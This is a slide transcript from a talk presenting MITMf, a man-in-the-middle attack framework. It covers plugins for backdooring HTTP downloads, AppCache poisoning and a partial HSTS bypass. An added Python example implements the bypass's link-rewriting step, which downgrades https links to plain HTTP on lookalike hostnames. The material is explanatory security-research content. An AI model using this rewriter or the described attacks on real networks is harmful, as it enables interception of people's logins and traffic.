MITMf: Bringing Man-In-The-Middle attacks to the 21st century
Transcript of MITMf: Bringing Man-In-The-Middle attacks to the 21st century
Contributed to the Veil-Framework, Kali-Nethunter, Responder, Impacket and more...
How did this get started?
I feel your pain bro...
Created by Ben Schmidt (@_supernothing)
Buy him a drink!
For those wondering, it stands for: Super Effective Recorder of Gathered Inputs and Outputs
So problem solved right?
Well not really...
Who the hell is Sergio??
What I wanted out of it
No reliance on external tools
Verbosity and logging
Minimize dependencies as much as possible (FAIL!)
BeEF and Metasploit integration via their respective API and RPC
Learn from other projects' mistakes!
HTA Drive by
Written by @rubenthijssen
Replaces strings in HTML content
Let's pause for a moment to understand how cool this is
Huge shout-out to @midnite_runr
Uses BDFactory to transparently backdoor executables going over HTTP
You can check out BDFactory at:
The plugin uses code from BDFproxy:
Uses Leonardo Nve's technique for partially bypassing HSTS
(buy him a drink!)
App Cache Poison
Implements Krzysztof Kotowicz (@kkotowicz) response tampering attacks
Gahhh! Voodoo?? No...
Returns redirect to
DNS request gets intercepted and
is mirrored to
We then re-write all links to the alternate domain
Client continues in plain-text since browser has no HSTS setting for
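The link-rewriting half of the partial HSTS bypass described above, as an added example (this is not MITMf's own code and not Leonardo Nve's implementation). The hostnames are constructed for illustration: the HSTS-protected host is assumed to be www.example.com and the alternate name the browser has no HSTS entry for is wwww.example.com. The rewriter turns https links and Location headers into plain-HTTP links on the alternate name, records the mapping so the spoofed DNS answer and the upstream TLS connection can be pointed back at the real host, and leaves non-HSTS hosts untouched.

```python
import re
from urllib.parse import urlsplit, urlunsplit


# Constructed example data: hostnames are placeholders, not taken from the talk.
HSTS_HOSTS = {"www.example.com"}


def alternate_host(host):
    """Pick a lookalike hostname the browser holds no HSTS entry for.
    Assumption for this example: add an extra 'w' to www.* names, otherwise
    prefix 'web.'; any label the attacker can answer DNS for would do."""
    if host.startswith("www."):
        return "wwww." + host[len("www."):]
    return "web." + host


class HstsBypassRewriter:
    """Rewrite https links to HSTS hosts into http links on an alternate name,
    remembering the mapping so later client requests can be mapped back."""

    def __init__(self, hsts_hosts):
        self.hsts_hosts = set(hsts_hosts)
        self.alt_to_real = {}  # alternate hostname seen from the client -> real host

    def rewrite_url(self, url):
        parts = urlsplit(url)
        if parts.scheme != "https" or parts.hostname not in self.hsts_hosts:
            return url  # not an HSTS host: plain sslstrip rules would apply
        alt = alternate_host(parts.hostname)
        self.alt_to_real[alt] = parts.hostname
        netloc = alt + (f":{parts.port}" if parts.port else "")
        return urlunsplit(("http", netloc, parts.path, parts.query, parts.fragment))

    def rewrite_location(self, location):
        # A 30x redirect to the https site is rewritten the same way.
        return self.rewrite_url(location)

    def rewrite_html(self, html):
        # Rewrite absolute https:// URLs inside the response body.
        return re.sub(r"https://[^\s\"'<>]+",
                      lambda m: self.rewrite_url(m.group(0)), html)

    def real_host(self, client_host):
        # For the DNS side: the alternate name resolves to the real host.
        return self.alt_to_real.get(client_host, client_host)

    def upstream_url(self, client_url):
        # For the proxy side: the client's plain-text request is replayed
        # over TLS to the real host.
        parts = urlsplit(client_url)
        real = self.alt_to_real.get(parts.hostname)
        if real is None:
            return client_url
        netloc = real + (f":{parts.port}" if parts.port else "")
        return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    rw = HstsBypassRewriter(HSTS_HOSTS)
    print(rw.rewrite_location("https://www.example.com/login"))
    print(rw.rewrite_html('<a href="https://www.example.com/account?id=1">Account</a>'))
    print(rw.upstream_url("http://wwww.example.com/account?id=1"))
```

The bypass is partial for a reason the rewriter makes visible: the alternate name must fall outside every HSTS entry the browser already holds, so a parent domain with includeSubDomains, or a site on the browser's preload list, defeats it, as does a user who types the https URL directly.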
Dan McInerney's (@DanHMcInerney)
Buy him a drink!
But dude! I want some shells <3
I got you covered!
Looking into the crystal ball...
Port everything over to mitmproxy
Make everything less 'hacky'
Evilgrade and Snarf integration
Actual SSL/TLS support
SSLsplit like functionality
MITM RDP connections (almost done)
More protocol level attacks (Yersinia)
More HSTS bypasses
Soooo.. How does this thing work?
Here we go... May the demo gods be with me...
The configuration file
If you're more of a Ruby person
Check bettercap out
Really awesome project by @evilsocket
Takes screenshots of clients browsers using HTML5 canvas
What it turned out to be...
A combination of the best features of 7+ tools all hacked to work together:
AppCache Poison, SSLstrip mod
Some JS from Metasploit